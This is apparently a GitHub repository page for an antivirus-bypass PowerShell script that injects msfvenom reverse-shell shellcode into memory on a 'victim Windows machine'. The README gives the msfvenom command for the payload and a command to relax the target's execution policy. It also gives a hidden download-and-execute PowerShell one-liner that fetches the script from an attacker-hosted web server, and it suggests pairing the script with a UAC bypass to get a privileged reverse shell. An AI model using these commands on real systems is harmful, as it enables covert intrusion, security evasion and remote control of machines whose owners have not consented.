Skip to content

Script made for bypassing antivirus using Powershell Injection method. Place your shellcode from msfvenom on line 15, the script can be combined with the UAC bypass technique in order to gain a privileged reverse shell.

License

Notifications You must be signed in to change notification settings

sergiovks/AntiVirus-Bypass-PowerShell-In-Memory-Injection

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

28 Commits
 
 
 
 
 
 
 
 

Repository files navigation

AntiVirus-bypass-PowerShell-In-Memory-Injection

Script made for bypassing antivirus using Powershell Injection method. Place your shellcode from msfvenom on line 15

VirusTotal Scan 19/59

Before running the script you have to set the ExecutionPolicy of the target machine to unrestricted:

powershell.exe

Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser

Example of the payload needed:

msfvenom -p windows/shell/reverse_tcp LHOST=IPkali LPORT=4444 -f powershell

Then we copy the payload like this:

Captura de pantalla 2023-02-27 210003.jpg

And paste the payload to the 15th line of the .ps1 file:

Captura de pantalla 2023-02-27 210359.jpg

Save the final PowerShell script and run it within the victim Windows machine.

We can combine this script with the use of the following command in order to download and inject the script, surely obtaining a reverse shell:

First of all you have to setup a python web server to host the payload, change the attacker IP and the PowerShell script name.

python3 -m http.server 80

Then you can use this command within the Windows target system:

$RegValue = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep Bypass -windowstyle hidden -nop iex (New-Object Net.WebClient).DownloadString('http://IPattacker/AVbypass.ps1'); Invoke-Function"

About

Script made for bypassing antivirus using Powershell Injection method. Place your shellcode from msfvenom on line 15, the script can be combined with the UAC bypass technique in order to gain a privileged reverse shell.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published